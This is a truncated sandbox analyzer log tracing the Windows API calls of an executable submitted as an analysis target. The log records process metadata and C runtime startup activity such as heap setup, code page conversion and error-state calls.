# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 15 2020 08:26:44 # Log Creation Date: 29.01.2020 14:57:52.464 Process: id = "1" image_name = "243e.tmp.exe.del105265203.del105731312.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe" page_root = "0x3365a000" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x444" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xaf4 [0040.347] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x90c42280, dwHighDateTime=0x1d5d6b4)) [0040.347] GetCurrentProcessId () returned 0xb04 [0040.347] GetCurrentThreadId () returned 0xaf4 [0040.347] GetTickCount () returned 0x11554a6 [0040.347] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=18085193945) returned 1 [0040.419] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0040.419] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x3e0000 [0040.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.421] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0040.421] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0040.421] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0040.421] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0040.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.421] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.421] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.422] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.422] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.422] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.422] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.423] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.423] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.423] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.424] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0040.424] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x214) returned 0x3e07d0 [0040.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.424] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0040.424] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0040.424] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0040.424] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0040.425] GetCurrentThreadId () returned 0xaf4 [0040.425] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0040.425] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x800) returned 0x3e09f0 [0040.425] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0040.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0040.425] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0040.425] SetHandleCount (uNumber=0x20) returned 0x20 [0040.425] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " [0040.425] GetEnvironmentStringsW () returned 0x251eb8* [0040.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0040.426] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x565) returned 0x3e11f8 [0040.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3e11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0040.426] FreeEnvironmentStringsW (penv=0x251eb8) returned 1 [0040.426] GetLastError () returned 0x0 [0040.426] SetLastError (dwErrCode=0x0) [0040.426] GetLastError () returned 0x0 [0040.426] SetLastError (dwErrCode=0x0) [0040.426] GetLastError () returned 0x0 [0040.426] SetLastError (dwErrCode=0x0) [0040.426] GetACP () returned 0x4e4 [0040.426] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x220) returned 0x3e1768 [0040.426] GetLastError () returned 0x0 [0040.426] SetLastError (dwErrCode=0x0) [0040.426] IsValidCodePage (CodePage=0x4e4) returned 1 [0040.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0040.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0040.426] GetLastError () returned 0x0 [0040.427] SetLastError (dwErrCode=0x0) [0040.427] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0040.427] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0040.427] GetLastError () returned 0x0 [0040.427] SetLastError (dwErrCode=0x0) [0040.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā") returned 256 [0040.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0040.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0040.427] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ×wê¥\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0040.427] GetLastError () returned 0x0 [0040.427] SetLastError (dwErrCode=0x0) [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā") returned 256 [0040.428] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0040.428] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꼟뽉鸘@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0040.428] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ×wê¥\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0040.428] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4b7470, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0040.428] GetLastError () returned 0x0 [0040.428] SetLastError (dwErrCode=0x0) [0040.428] GetLastError () returned 0x0 [0040.428] SetLastError (dwErrCode=0x0) [0040.428] GetLastError () returned 0x0 [0040.428] SetLastError (dwErrCode=0x0) [0040.428] GetLastError () returned 0x0 [0040.428] SetLastError (dwErrCode=0x0) [0040.428] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.429] GetLastError () returned 0x0 [0040.429] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.430] GetLastError () returned 0x0 [0040.430] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.431] GetLastError () returned 0x0 [0040.431] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.432] SetLastError (dwErrCode=0x0) [0040.432] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError (dwErrCode=0x0) [0040.433] GetLastError () returned 0x0 [0040.433] SetLastError 